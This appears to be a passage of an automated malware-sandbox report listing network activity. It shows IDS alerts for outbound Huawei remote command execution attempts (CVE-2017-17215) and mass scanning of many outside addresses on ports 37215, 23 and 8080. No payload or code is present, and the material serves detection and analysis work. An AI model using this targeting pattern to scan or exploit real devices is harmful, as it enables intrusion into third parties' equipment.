    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43164 -> 156.247.29.27:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43164 -> 156.247.29.27:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44612 -> 41.40.32.140:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44612 -> 41.40.32.140:37215
    Source: global trafficTCP traffic: 156.224.12.71 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 156.247.25.138 ports 1,2,3,5,7,37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39532
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39584
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39634
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39738
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39760
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39780
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39794
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39802
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39806
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47142 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59458 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59458 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59458
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54822 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 54822
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40606 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33132 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33132
    Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54828 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 54828
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47828
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 50140
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51906 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56464 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51906 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 51906
    Source: unknownNetwork traffic detected: HTTP traffic on port 56464 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41782 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36050 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52240 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39794 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55468
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39794
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55468
    Source: unknownNetwork traffic detected: HTTP traffic on port 41782 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55496
    Source: unknownNetwork traffic detected: HTTP traffic on port 40022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55522
    Source: unknownNetwork traffic detected: HTTP traffic on port 56464 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55522
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55536
    Source: unknownNetwork traffic detected: HTTP traffic on port 40022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55624
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52240 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56296
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55672
    Source: unknownNetwork traffic detected: HTTP traffic on port 43164 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55710
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56338
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55740
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56376
    Source: unknownNetwork traffic detected: HTTP traffic on port 44612 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44612
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55752
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56388
    Source: unknownNetwork traffic detected: HTTP traffic on port 41782 -> 37215
    Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
    Source: global trafficTCP traffic: 192.168.2.14:50060 -> 74.50.84.203:45
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.121.211.145:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.172.37.157:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.123.80.145:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.99.68.19:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.166.51.15:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.80.192.155:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.197.3.84:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.154.63.250:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.224.12.71:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.15.236.2:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.187.124.142:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.117.233.218:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.165.2.33:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.2.122.90:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.88.16.59:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.15.231.45:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.195.119.199:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.134.79.11:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.38.129.117:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.151.29.152:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.249.58.104:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.209.75.22:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.208.132.161:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.103.199.52:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.109.92.169:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.207.202.240:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.79.192.50:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.232.225.235:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.96.81.2:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.134.204.33:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.203.174.213:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.204.225.82:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.193.10.55:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.92.95.213:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.176.132.116:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.166.153.43:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.56.16.5:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.213.39.70:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.78.80.52:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.71.85.143:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.127.103.188:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.94.158.108:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.18.83.31:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.24.201.28:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.160.222.165:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.246.79.25:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.187.113.108:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.24.144.199:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.246.229.20:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.15.56.22:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.210.55.224:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.69.70.180:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.25.150.137:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.77.136.4:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.230.150.51:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.59.35.246:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.69.27.33:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.199.76.7:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.250.204.254:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.37.11.185:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.46.79.180:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.69.140.35:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.134.104.238:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.151.214.94:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.2.168.117:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.71.32.157:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.147.159.113:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.193.237.108:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.187.49.42:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.140.30.9:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.175.184.223:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.133.29.47:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.21.108.155:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.248.142.148:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.139.41.211:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.138.115.132:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.123.112.158:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.199.183.62:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.244.237.36:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.201.87.12:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.98.251.144:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.113.47.60:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.2.66.16:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.101.184.158:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.58.65.67:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.151.76.188:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.190.170.118:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.189.173.53:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.136.176.60:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.88.219.88:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.92.212.239:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.119.166.11:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.179.88.99:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.62.46.166:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.55.246.208:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.175.86.38:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.77.71.30:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.172.140.165:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.193.26.184:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.98.139.150:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.145.225.130:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.129.10.187:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.247.209.137:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.201.8.90:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.9.190.94:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.184.122.222:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.102.11.247:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.35.86.216:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.247.25.138:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.229.20.166:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.159.61.225:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.201.144.141:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.246.33.198:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.56.238.118:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.43.250.54:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.153.2.29:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.135.96.104:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.185.162.173:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.177.107.227:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.210.142.205:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.125.63.206:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.25.29.244:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.187.103.230:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.131.217.146:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.169.68.249:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.222.22.253:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.185.54.11:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.195.214.250:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.81.14.86:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.189.91.58:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.122.34.66:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.231.90.192:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.64.111.137:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.38.44.46:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.131.25.98:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.110.252.230:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.38.131.30:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.163.32.133:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.139.106.208:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.184.29.179:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.190.80.129:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.202.118.2:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.92.155.84:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.200.172.55:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.122.255.3:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.6.237.102:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.226.147.158:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.183.137.1:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.57.146.226:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.15.61.67:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.138.37.96:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.161.160.151:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 156.222.100.126:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.17.175.26:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.9.82.234:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.115.47.238:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.192.195.90:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.224.167.48:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 197.35.125.29:37215
    Source: global trafficTCP traffic: 192.168.2.14:47830 -> 41.148.33.245:37215
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.126.83.150:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.75.180.144:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.159.122.0:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.38.54.164:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.170.178.213:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.13.190.37:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.219.46.253:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.141.178.50:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.225.78.184:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.199.75.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.155.123.210:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.149.168.137:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.142.13.40:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.178.166.45:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.245.47.161:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.137.103.32:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.246.200.136:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.242.41.226:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.157.150.206:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.247.132.11:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.133.190.130:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.219.230.232:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.247.45.61:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.240.146.97:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.106.28.2:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.126.46.107:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.223.185.239:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.15.1.233:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.240.153.124:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 94.200.64.225:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.154.233.50:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.237.21.197:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.99.135.211:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.115.209.167:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.209.26.14:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.77.87.46:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.60.223.178:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 62.12.187.84:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.36.141.140:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.208.79.212:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.49.131.229:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.31.154.244:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 95.3.121.57:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 85.141.216.135:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.163.222.78:8080
    Source: global trafficTCP traffic: 192.168.2.14:47816 -> 31.107.119.5:8080
